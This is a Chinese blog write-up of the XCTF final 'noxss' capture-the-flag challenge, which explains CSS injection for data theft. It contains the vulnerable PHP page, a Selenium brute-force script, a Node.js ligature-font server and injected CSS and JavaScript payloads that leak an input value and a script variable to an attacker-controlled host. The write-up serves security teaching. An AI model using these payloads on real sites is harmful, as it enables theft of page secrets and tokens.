XCTF final noxss

最新推荐文章于 2024-04-19 09:43:05 发布
最新推荐文章于 2024-04-19 09:43:05 发布
阅读量460 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/103431033
版权

0x01 题目描述

这次题目主要是通过css注入提取script里一个变量的值,即flag

我们举个例子,先贴出代码。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
<?php
$token1 = md5($_SERVER['HTTP_USER_AGENT']);
?>
<input type=hidden value=<?=$token1 ?>>
<script>
var TOKEN = 'xctf{dobra_robota_jestes_mistrzem_CSS}';
</script>

<style>
true<?=preg_replace('#</style#i', '#', $_GET['css']) ?>
</style>
</body>
</html>

我们今天分为两个内容

提取input中value
提取script里面的变量TOKEN

0x02 题目分析

提取inputvalue其实比较简单,直接贴出payload

import string 
from selenium import webdriver	
browser = webdriver.Chrome()
flag = ''
s = string.digits+string.ascii_letters+'{'+'}'+'_'
for i in s:
         flag += i
         url = 'http://127.0.0.1/cssgame/?css=input[value^=%%22%s%%22]%%20{%%20background:url(http://xxx.xxx.xxx.xxx:8885/%s);}' %(flag, flag)
         flag=flag[:-1]
         browser.get(str(url))

通过匹配css选择input,这里%%22代表",这儿使用两个%%,是为了防止被格式化
然后使用webdriver.Chrome(),自动渲染css,访问自己vps












提取script里面的值比较困难,我们这儿的思路是,使用连体字。
我们先介绍一下连体字

简而言之,字体中的连字是至少两个具有图形表示形式的字符的序列。最常见的连字可能是”fi”序列。在下面的图片中,我们可以很清晰地看到”f”与”i”;而在第二行中,我们对这两个字母的顺序使用了不同的字体表示-字母”f”的顶部连接到”i”上方的点。这里我们应该将连字与字距区别开来:字距调整仅确定字体中字母之间的距离,而连字是给定字符序列的完全独立的字形(图形符号
在这里插入图片描述我们可以借助 fontforge 来生成我们需要的连字,因为现代浏览器已经不支持 SVG 格式的字体了,我们可以利用 fontforge 将 SVG 格式转换成 WOFF 格式,我们可以准备一个名为 script.fontforge 的文件,内容如下:

#!/usr/bin/fontforge
Open($1)
Generate($1:r + ".woff")

我们可以用`fontforge script.fontforge .svg`这个命令来生成 `woff` 文件,下面这段 `svg` 代码定义了一种名叫 `hack` 的字体,包括 a-z 26 个0宽度的字母,以及 `sekurak` 这个宽度为8000的连字。 
<svg>
  <defs>
    <font id="hack" horiz-adv-x="0">
      <font-face font-family="hack" units-per-em="1000" />
      <missing-glyph />
      <glyph unicode="a" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="b" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="c" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="d" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="e" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="f" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="g" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="h" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="i" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="j" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="k" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="l" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="m" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="n" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="o" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="p" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="q" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="r" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="s" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="t" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="u" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="v" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="w" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="x" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="y" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="z" horiz-adv-x="0" d="M1 0z"/>
      <glyph unicode="sekurak" horiz-adv-x="8000" d="M1 0z"/>
    </font>
  </defs>
</svg>

这儿sekurak就代表一个连体字,虽然有很由很多字母组成,但html就认为这是一个字

这儿贴出一个node.js代码,主要是作用是一个生成连体字woff文件的api接口

const express = require('express');
const app = express();
// Serwer ExprssJS domyślnie dodaje nagłówek ETag,
// ale nam nie jest to potrzebne, więc wyłączamy.
app.disable('etag');

const PORT = 3001;
const js2xmlparser = require('js2xmlparser');
const fs = require('fs');
const tmp = require('tmp');
const rimraf = require('rimraf');
const child_process = require('child_process');


// Generujemy fonta dla zadanego przedrostka
// i znaków, dla których ma zostać utworzona ligatura.
function createFont(prefix, charsToLigature) {
    let font = {
        "defs": {
            "font": {
                "@": {
                    "id": "hack",
                    "horiz-adv-x": "0"
                },
                "font-face": {
                    "@": {
                        "font-family": "hack",
                        "units-per-em": "1000"
                    }
                },
                "glyph": []
            }
        }
    };
    
    // Domyślnie wszystkie możliwe znaki mają zerową szerokość...
    let glyphs = font.defs.font.glyph;
    for (let c = 0x20; c <= 0x7e; c += 1) {
        const glyph = {
            "@": {
                "unicode": String.fromCharCode(c),
                "horiz-adv-x": "0",
                "d": "M1 0z",
            }
        };
        glyphs.push(glyph);
    }
    
    // ... za wyjątkiem ligatur, które są BARDZO szerokie.
    charsToLigature.forEach(c => {
        const glyph = {
            "@": {
                "unicode": prefix + c,
                "horiz-adv-x": "10000",
                "d": "M1 0z",
            }
        }
        glyphs.push(glyph);
    });
    
    // Konwertujemy JSON-a na SVG.
    const xml = js2xmlparser.parse("svg", font);
    
    // A następnie wykorzystujemy fontforge
    // do zamiany SVG na WOFF.
    const tmpobj = tmp.dirSync();
    fs.writeFileSync(`${tmpobj.name}/font.svg`, xml);
    child_process.spawnSync("/usr/bin/fontforge", [
        `${__dirname}/script.fontforge`,
        `${tmpobj.name}/font.svg`
    ]);

    const woff = fs.readFileSync(`${tmpobj.name}/font.woff`);
    
    // Usuwamy katalog tymczasowy.
    rimraf.sync(tmpobj.name);

    // I zwracamy fonta w postaci WOFF.
    return woff;
}

// Endpoint do generowania fontów.
app.get("/font/:prefix/:charsToLigature", (req, res) => {
    const { prefix, charsToLigature } = req.params;
    
    // Dbamy o to by font znalazł się w cache'u.
    res.set({
        'Cache-Control': 'public, max-age=600',
        'Content-Type': 'application/font-woff',
        'Access-Control-Allow-Origin': '*',
    });
    
    res.send(createFont(prefix, Array.from(charsToLigature)));
     
});

// Endpoint do przyjmowania znaków przez połączenie zwrotne
app.get("/reverse/:chars", function(req, res) {
    res.cookie('chars', req.params.chars);
    res.set('Set-Cookie', `chars=${encodeURIComponent(req.params.chars)}; Path=/`);
    res.send();
});

app.get('/cookie.js', (req, res) => {
trueres.sendFile('js.cookie.js', {
truetrueroot: './node_modules/js-cookie/src/'
true});
});

app.get('/index.html', (req, res) => {
trueres.sendFile('index.html', {
truetrueroot: '.'
true});
});

app.listen(PORT, () => {
trueconsole.log(`Listening on ${PORT}...`);
})

这个必须在linux上运行,好像fontgorge的命令模式只有linux上有,假如我们在Linux上运行,接着我们访问http://xxx.xxx.xxx.xxx:23460/font/prefix/c就能够生成一个连体字文件.
假如我们访问/font/xctf{/abc就会生成xctf{axctf{bxctf{c的连体字,其余字的宽度都为0。
接着我们就注入css

<style>
        @font-face {
            font-family: "hack";
            src: url(http://172.16.71.138:3001/font/xctf{/x);   #连体字的生成api
        }
        script {
            display: table;								#使得script标签里面的内容能够显示出来
            font-family: "hack";
            white-space: nowrap;
            background: lightblue;
        }
        body::-webkit-scrollbar {
            background: blue;
        }
        body::-webkit-scrollbar:horizontal {
            display:block;
            background: blue url(http://xxx.xxx.xxx.xxx:9999);      #当出现滚动条时访问vps
        }
    </style>

贴出payload 
<script>
        //const chars = ['t','f']
        const chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_'.split('')
        let ff = [],
            data = ''
        let prefix = 'xctf{'
        chars.forEach(c => {
            var css = ''
            css = '=../../../../\fa{}){}'
            css +=
                `body{overflow-y:hidden;overflow-x:auto;white-space:nowrap;display:block}html{display:block}*{display:none}body::-webkit-scrollbar{display:block;background: blue url(http://172.16.71.138:9999/?${encodeURIComponent(prefix+c)})}`
            css += `@font-face{font-family:a${c.charCodeAt()};src:url(http://172.16.71.138:23460/font/${prefix}/${c});}`
            css += `script{font-family:a${c.charCodeAt()};display:block}`
            document.write(
                '<iframe scrolling=yes samesite src="http://127.0.0.1/index.php?css=' +
                encodeURIComponent(css) +
                '" style="width:1000000px" οnlοad="event.target.style.width=\'100px\'"></iframe>')
        })
</script>

推荐使用谷歌浏览器,并且关闭同源策略
嗯~~这儿的wp就不写很详细了,仔细看看代码应该可以理解,最近比较忙
这儿再贴出几个参考地址,希望能够好好理解一下
其他writeup
连体字生成的代码参考地址(波兰语)

HyyMbb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Xctf部分题目
weixin_43847235的博客
11-14 805
题目来源 https://adworld.xctf.org.cn/task WEB 新手题 backup 这道题目http://111.198.29.45:41660/index.php.bak即可拿到flag。 题目并不难,记录一下常见的备份文件/源码泄露。 分布式版本控制系统(git)源码泄漏 .git .gitignore 集中式版本控制系统(svn)源码泄漏 .svn VIM编辑器 ...
2018 XCTF FINALS
Risker
11-06 1201
欢迎关注我的新博客: http://mmmmmmlei.cn 有幸参加了 2018 XCTF FINALS,线下长了不少见识。回学校就打了上海市大学生网络安全竞赛,现在记录一下 XCTF FINALS。 攻防赛四道 pwn,Web 狗也只能打打解题这样子… 解题有 5 道 Misc,2 道 Web 和 4 道 pwn,和队友做出了两道 Misc ,一道 Web 和两道 pwn。不得不说这次的 Mi...
2016-XCTF Final-Richman
weixin_30635053的博客
08-05 173
抽时间将XCTF Final中Richman这个题总结了下。题目及ida idb所在的链接在:http://files.cnblogs.com/files/wangaohui/richman-blog.zip 在比赛中,我们很快地就Fuzz到了漏洞所在的位置,但是可能是由于现场的环境和平常线上赛的环境不太一样,并没有很快的写出漏洞利用程序。将Crash时的输入进行精简,得到下面的...
2023XCTF FINAL web题复现
2302_76827504的博客
04-28 275
当时是和SU一起去打的,完整的wp可以查看,我这里只是参考wp复现一下两道web题。
推荐开源项目:NoXss - 防护跨站脚本攻击的强大工具
最新发布
gitblog_00027的博客
04-19 256
推荐开源项目:NoXss - 防护跨站脚本攻击的强大工具 NoXss项目地址:https://gitcode.com/gh_mirrors/no/NoXss 是一个轻量级但功能强大的库,专为防止Web应用中的跨站脚本(Cross-Site Scripting, XSS)攻击而设计。该项目采用Java语言开发,易于集成,并且针对各种常见的XSS漏洞提供了有效的防御策略。 项目简介 NoXss致力于...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
writeup:xctf撰写
03-28
写上去xctf撰写
NoXss Vol1.0
weixin_30418341的博客
08-11 208
<?php error_reporting(0); date_default_timezone_set('Asia/Shanghai'); // SETTING $password = ''; // PASSWORD OF DOUBLE MD5 $smtpserver = 'smtp.mail.yahoo.com.cn'; // SMTP SERVICE $smt...
XCTF 进阶 RE re1-100
A_dmin的博客
07-15 1936
XCTF 进阶 RE re1-100 一天一道CTF题目,能多不能少 打开题目,发现是一个elf文件,直接用ida打开(64),找到主函数main 直接进行分析,函数太长就不贴了~ 找到如下代码: 这一堆的代码看上去就是检查一些东西的,比如说checkStringIsNumber()就是检查字符串是不是全部都是数字: 继续往下走,一步一步分析代码: bufParentRead这个应该就是我们...
XCTF 攻防世界 Web题的基本知识点
weixin_43456810的博客
11-28 2163
XCTF 攻防世界 Web题的基本知识点和解题思路 大多数情况下,robots协议指的就是robots.txt index.php的备份文件:/index.php.bak 页面中如果出现了不能按的按钮,可能是代码中设置了disable参数,将网页源代码中的disable=""删除或者改为false(注意:safari浏览器可能无法方便的直接修改源代码,可以换为firefox浏览器) 遇到php的源代码,注重分析,如果只是简短的几行代码,并且有类似于$a, $b这样的变量,可以直接在url的后面添加上 /?
2019XCTF攻防世界之萌新入坑
weixin_44113469的博客
04-06 1627
XCTF攻防世界的题质量确实很高,还有解题思路和writeup,真是棒极了。 萌新入坑 0x01 babystack 保护机制 题目开启了nx,canary 题目代码 思路分析 ①这道题主要是绕过canary,然后栈溢出getshell。 ②经分析,read函数读入到s处,可以溢出。 ③put函数输出s的内容,遇到’\x00’才停止,即使字符串中存在’\n’,也会继续输出,用...
XCTF-高手进阶区:NewsCenter
1stPeak's Blog
06-13 3195
XCTF-高手进阶区:NewsCenter
【愚公系列】2023年04月 攻防世界-MOBILE(easy-apk)
时光隧道
12-13 3万+
下面介绍两个反编译工具jadx是一个用于反编译Android APK文件的开源工具,静态反编译,查找索引功能强大jeb和IDA很像,属于动态调试,可以看java汇编也可以生成伪代码,还可以动态attach到目标调试对于so文件的逆向工具选择IDA逆向工具是一款反汇编器,被广泛应用于软件逆向工程领域,能够反汇编各种不同平台的二进制程序代码,并还原成可读的汇编代码。
html标签中的<meta charset="utf-8">是什么鬼?
热门推荐
滕安超的博客
11-23 5万+
首先来说明一下“utf-8”是一种字符编码。charset=”utf-8”是告知浏览器此页面属于什么字符编码格式,下一步浏览器做好“翻译”工作。常见的字符编码有:gb2312、gbk、unicode、utf-8。各个字符编码含义: gb2312:代表国家标准第2312条,其中是不包含繁体的(虽然咱们不怎么使用繁体了,但是台湾还在使用繁体啊。那怎么办呢?)。 gbk:国家标准扩展版(增加了繁体,包
HTML在网页标题栏中插入图标图片
qq_50887722的博客
09-01 4905
<!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>
实战:2019 0ctf final Web Writeup(一)
systemino的博客
07-04 1041
前言 鸽了好久的题解,因为自己事务缠身,一直没时间写一下最近比赛的题解,趁近日有空,来填坑~ 第一次参加0ctf新星赛就拿了冠军,还是非常开心的。比赛过程中,web共4道题,我有幸做出3道,java实在不太擅长,哭了(另一道是ocaml的题目,涉及小trick和逻辑问题,准备放在后面和java一起编写(希望不要咕咕咕了)。这里写出另外两道题目的题解如下: 114514_calcalcalc ...
XCTF攻防世界web进阶练习_ 1_NewsCenter
silence1_的博客
04-30 3051
XCTF攻防世界web进阶练习—NewsCenter 题目 题目是NewsCenter,没有提示信息。 打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有什么变化,考虑SQL注入。 随便输入123,用burp抓包,发现是post方式,因为sql注入技术太菜,直接用sqlmap爆破。 将http头保存为1.txt,试试用sqlmap爆数据库 ...
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值